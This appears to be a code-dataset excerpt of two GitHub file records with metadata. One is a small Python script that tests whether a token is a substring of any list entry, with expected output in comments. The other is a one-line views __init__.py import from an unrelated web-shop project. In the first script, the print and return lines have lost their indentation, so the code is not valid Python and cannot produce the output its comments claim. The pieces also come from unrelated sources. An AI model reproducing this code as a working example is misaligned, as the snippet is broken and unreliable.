| no_license | https://github.com/benwei/Learnings | a52a751e6ba9bbbbf7b51b0e6b6ac5e839a87cd3 | e020698c2be16bf7eb1c7fb9bf19276165cc0400 | refs/heads/master | 2023-02-04T22:27:00.182020 | 2023-01-19T16:52:31 | 2023-01-19T16:57:43 | 1,994,139 | 4 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
some_list = ['abc-123', 'def-456', 'ghi-789', 'abc-456']
def string_in_list(token, alist):
    if any(token in s for s in alist):
print("%s in" % token)
return 1
print("%s not in" % token)
return 0
string_in_list('abc', some_list)
string_in_list('546', some_list)
string_in_list('ooo', some_list)
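# Expected output:
# abc in
# 546 not in  ('546' is not a substring of any entry, though '456' would be)
# ooo not in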
| UTF-8 | Python | false | false | 331 | py | 593 | test08_any_in_list.py | 308 | 0.592145 | 0.540785 | 0 | 15 | 21 | 56 |
Hagen013/presidentwatches | 13,778,255,108,366 | 6174f3b52dfbec9865f94c640e884ec9d87e472f | d210853ba6d1f3b5383a09e1b553c19083d78014 | /server/api/views/__init__.py | e6f3f66aa7aaa70a6b01e17435ed6ce2cb7a37fb | []
| no_license | https://github.com/Hagen013/presidentwatches | f252c7995e39f6cffb6608e43f555abc32f6a9fc | b9ca72aef1db01262675274c83a5c5dff4d6e2da | refs/heads/master | 2022-12-17T08:45:15.541869 | 2019-12-29T17:48:56 | 2019-12-29T17:48:56 | 162,160,435 | 0 | 0 | null | false | 2022-12-08T01:49:45 | 2018-12-17T16:36:05 | 2019-12-29T17:49:10 | 2022-12-08T01:49:45 | 8,814 | 0 | 0 | 22 | HTML | false | false | from .viewsets import ModelViewSet, ListViewMixin
| UTF-8 | Python | false | false | 50 | py | 451 | __init__.py | 267 | 0.86 | 0.86 | 0 | 1 | 49 | 49 |